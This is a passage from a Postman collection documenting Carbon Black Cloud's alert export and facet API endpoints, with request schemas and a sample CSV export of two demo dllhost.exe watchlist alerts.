 },\n  \"exclusions\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"alert_origin\": [\n      \"&lt;string&gt;\"\n    ]\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"NONE\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      &lt;integer&gt;\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    }\n  },\n  \"format\": \"&lt;string&gt;\",\n  \"fields\": [\"&lt;string&gt;\"]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"2ec18401-77e8-4009-a46e-c80241381b61","name":"Export Alerts","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"time_range\": {\n        \"range\": \"-2w\"\n    },\n    \"criteria\": {\n        \"minimum_severity\": 2\n    },\n    \"format\": \"CSV\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_export"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 28 May 2024 16:51:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"24"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"Vary","value":"Origin"},{"key":"Vary","value":"Access-Control-Request-Method"},{"key":"Vary","value":"Access-Control-Request-Headers"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"0"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"6248139\"\n}"},{"id":"728e9b5d-51b0-4512-8729-33808e092324","name":"Download Job Output","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/download"},"status":"OK","code":200,"_postman_previewlanguage":"raw","header":[{"key":"x-amz-id-2","value":"2CHpdrNOSOUw971m7hS4HbJTFyXaEQCF89MQchVUnClOeqJxEFNOUpLBQ7VOAiEVPkyg6oH83ag="},{"key":"x-amz-request-id","value":"VR3ZE66MZT2CRPEJ"},{"key":"Date","value":"Tue, 28 May 2024 16:53:20 GMT"},{"key":"Last-Modified","value":"Tue, 28 May 2024 16:53:00 GMT"},{"key":"x-amz-expiration","value":"expiry-date=\"Fri, 28 Jun 2024 00:00:00 GMT\", rule-id=\"JobOutputCleanup\""},{"key":"ETag","value":"\"1b3759fc66fd203004e96ead675cfcd8\""},{"key":"x-amz-server-side-encryption","value":"AES256"},{"key":"Accept-Ranges","value":"bytes"},{"key":"Content-Type","value":"application/octet-stream"},{"key":"Server","value":"AmazonS3"},{"key":"Content-Length","value":"126675"}],"cookie":[],"responseTime":null,"body":"alert_notes_present,alert_url,asset_group,asset_id,attack_tactic,attack_technique,backend_timestamp,backend_update_timestamp,blocked_effective_reputation,blocked_md5,blocked_name,blocked_sha256,childproc_cmdline,childproc_effective_reputation,childproc_guid,childproc_md5,childproc_name,childproc_sha256,childproc_username,chrome_device_id,connection_type,container_id,container_image_hash,container_image_name,container_name,detection_timestamp,determination_change_timestamp,determination_changed_by,determination_changed_by_type,determination_value,device_external_ip,device_id,device_internal_ip,device_location,device_name,device_os,device_os_version,device_policy,device_policy_id,device_target_value,device_uem_id,device_username,egress_group_id,egress_group_name,external_device_friendly_name,first_event_timestamp,id,ioc_field,ioc_hit,ioc_id,ip_reputation,is_updated,k8s_cluster,k8s_kind,k8s_namespace,k8s_pod_name,k8s_policy,k8s_policy_id,k8s_rule,k8s_rule_id,k8s_workload_name,last_event_timestamp,mdr_alert,mdr_alert_notes_present,mdr_determination_value,mdr_threat_notes_present,mdr_workflow_is_assigned,mdr_workflow_status,ml_classification_anomalies,ml_classification_final_verdict,ml_classification_global_prevalence,ml_classification_org_prevalence,netconn_local_ip,netconn_local_ipv4,netconn_local_ipv6,netconn_local_port,netconn_protocol,netconn_remote_domain,netconn_remote_ip,netconn_remote_ipv4,netconn_remote_ipv6,netconn_remote_port,org_key,parent_cmdline,parent_effective_reputation,parent_guid,parent_md5,parent_name,parent_pid,parent_reputation,parent_sha256,parent_username,policy_applied,primary_event_id,process_cmdline,process_container_pid,process_effective_reputation,process_guid,process_issuer,process_md5,process_name,process_pid,process_publisher,process_reputation,process_sha256,process_username,product_id,product_name,reason,reason_code,remote_is_private,remote_k8s_kind,remote_k8s_namespace,remote_k8s_pod_name,remote_k8s_workload_name,report_description,report_id,report_link,report_name,report_tags,rule_category_id,rule_config_category,rule_config_id,rule_config_name,rule_id,run_state,sensor_action,serial_number,severity,tags,threat_hunt_id,threat_hunt_name,threat_id,threat_name,threat_notes_present,tms_rule_id,ttps,type,user_update_timestamp,vendor_id,vendor_name,watchlists,workflow_change_timestamp,workflow_changed_by,workflow_changed_by_rule_id,workflow_changed_by_type,workflow_closure_reason,workflow_status\nfalse,defense.conferdeploy.net/alerts?s[c][query_string]=id:4870e071-9c7d-4147-b00d-0be988ff920a&orgKey=ABCD1234,,,,,2024-05-28T13:27:23.815596681Z,2024-05-28T13:27:23.815596681Z,,,,,,,,,,,,,,,,,,2024-05-28T13:24:28.335Z,2024-05-28T13:27:23.815596681Z,,,NONE,1.2.3.4,18741265,10.203.101.185,UNKNOWN,DEMO-WIN,WINDOWS,Windows 10 x64,Standard,165700,MEDIUM,,,,,,2024-05-28T13:20:42.954Z,4870e071-9c7d-4147-b00d-0be988ff920a,,(process_name:dllhost.exe) AND process_publisher_state:FILE_SIGNATURE_STATE_VERIFIED ,529de965-e1f6-4e7d-a37e-9e392da29740,,false,,,,,,1b32b7cf-7c3d-30f1-97b4-6ec2e39530c9,,627bbdfe-55a7-3100-89bc-25d618fb9684,,2024-05-28T13:20:42.954Z,false,false,,false,false,,,,,,,,,0,,,,,,0,ABCD1234,C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p,TRUSTED_WHITE_LIST,ABCD1234-011df811-00000330-00000000-1daa67e691ecdb8,7469cc568ad6821fd9d925542730a7d8,c:\\windows\\system32\\svchost.exe,816,TRUSTED_WHITE_LIST,,NT AUTHORITY\\SYSTEM,NOT_APPLIED,1yR4WspiQUmlqaWJRHV9eg-0,C:\\WINDOWS\\system32\\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F},0,TRUSTED_WHITE_LIST,ABCD1234-011df811-00001c44-00000000-1daa67eb00776e6,[Microsoft Windows Production PCA 2011],dfe1e4b1b8714cbe1005ee9413c2bae9,c:\\windows\\system32\\dllhost.exe,7236,[Microsoft Windows],TRUSTED_WHITE_LIST,0309834d40475ccd5a88c48f7ff5ec62e5c6798900357dd83665c3d0345124e0,DEMO-WIN\\DEMO-DOMAIN,,,\"Process dllhost.exe was detected by the report \"\"demo-report\"\" in watchlist \"\"demo-watchlist\"\"\",1b32b7cf-7c3d-30f1-97b4-6ec2e39530c9:627bbdfe-55a7-3100-89bc-25d618fb9684,false,,,,,,Q0O2FxEWSy2fSSYxEs2Pg,,demo-report,,1b32b7cf-7c3d-30f1-97b4-6ec2e39530c9,,,,627bbdfe-55a7-3100-89bc-25d618fb9684,RAN,ALLOW,,5,,,,1B32B7CF7C3D40F117B46EC2E39530C9,,true,,,WATCHLIST,,,,,2024-05-28T13:27:23.815596681Z,ALERT_CREATION,,SYSTEM,,OPEN\nfalse,defense.conferdeploy.net/alerts?s[c][query_string]=id:f3b3f70d-28a1-4764-9385-89331608e0f3&orgKey=ABCD1234,,,,,2024-05-28T12:55:56.709689187Z,2024-05-28T12:55:56.709689187Z,,,,,,,,,,,,,,,,,,2024-05-28T12:52:34.185Z,2024-05-28T12:55:56.709689187Z,,,NONE,1.2.3.4,19013608,9.8.7.6,UNKNOWN,DEMO-02\\DEMO-DOMAIN,WINDOWS,Windows 10 x64,Demo Policy,465946,MEDIUM,,,,,,2024-05-28T12:48:32.406Z,f3b3f70d-28a1-4764-9385-89331608e0f3,,(process_name:dllhost.exe) AND process_publisher_state:FILE_SIGNATURE_STATE_VERIFIED ,529de965-e1f6-4e7d-a37e-9e392da29740,,false,,,,,,1b32b7cf-7c3d-30f1-97b4-6ec2e39530c9,,627bbdfe-55a7-3100-89bc-25d618fb9684,,2024-05-28T12:48:32.406Z,false,false,,false,false,,,,,,,,,0,,,,,,0,ABCD1234,C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p,TRUSTED_WHITE_LIST,ABCD1234-01221fe8-00000338-00000000-1daa710f1091653,7469cc568ad6821fd9d925542730a7d8,c:\\windows\\system32\\svchost.exe,824,TRUSTED_WHITE_LIST,,NT AUTHORITY\\SYSTEM,NOT_APPLIED,AZDQ1VvNSdyupi9rG-4nOg-0,C:\\Windows\\system32\\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F},0,TRUSTED_WHITE_LIST,ABCD1234-01221fe8-00001f70-00000000-1daa7113a0da2e2,[Microsoft Windows Production PCA 2011],dfe1e4b1b8714cbe1005ee9413c2bae9,c:\\windows\\system32\\dllhost.exe,8048,[Microsoft Windows],TRUSTED_WHITE_LIST,0309834d40475ccd5a88c48f7ff5ec62e5c6798900357dd83665c3d0345124e0,DEMO-02\\DEMO-DOMAIN,,,\"Process dllhost.exe was detected by the report \"\"demo-report\"\" in watchlist \"\"demo-watchlist\"\"\",1b32b7cf-7c3d-30f1-97b4-6ec2e39530c9:627bbdfe-55a7-3100-89bc-25d618fb9684,false,,,,,,Q0O2FxEWSy2fSSYxEs2Pg,,demo-report,,1b32b7cf-7c3d-30f1-97b4-6ec2e39530c9,,,,627bbdfe-55a7-3100-89bc-25d618fb9684,RAN,ALLOW,,5,,,,1B32B7CF7C3D40F117B46EC2E39530C9,,true,,,WATCHLIST,,,,,2024-05-28T12:55:56.709689187Z,ALERT_CREATION,,SYSTEM,,OPEN\n"}],"_postman_id":"52b22f98-a26d-43e8-b10d-99af42c1b4a0"},{"name":"Facet alerts - ungrouped","id":"962459c7-14b0-49dc-9fc5-41472be723ea","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"terms\": {\n        \"fields\": [\n            \"type\",\n            \"THREAT_ID\"\n        ],\n        \"rows\": 3\n    },\n    \"criteria\": {\n        \"minimum_severity\": \"3\"\n    },\n    \"exclusions\": {\n        \"type\": [\n            \"HOST_BASED_FIREWALL\",\n            \"CONTAINER_RUNTIME\"\n        ]\n    },\n    \"filter_values\": true\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_facet","description":"<p>Find facets for alerts.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p>See complete Alerts API documentation <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">here</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"terms\": {\n    \"fields\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rows\": \"&lt;integer&gt;\"\n  },\n  \"query\": \"&lt;string&gt;\",\n  \"time_range\": {\n    \"start\": \"&lt;dateTime&gt;\",\n    \"end\": \"&lt;dateTime&gt;\",\n    \"range\": \"&lt;string&gt;\"\n  },\n  \"criteria\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": \"&lt;integer&gt;\",\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"SUPPRESSION\",\n      \"SUPPRESSION\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": \"&lt;boolean&gt;\",\n    \"threat_notes_present\": \"&lt;boolean&gt;\",\n    \"device_id\": [\n      \"&lt;long&gt;\"\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      \"&lt;long&gt;\"\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_local_port\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    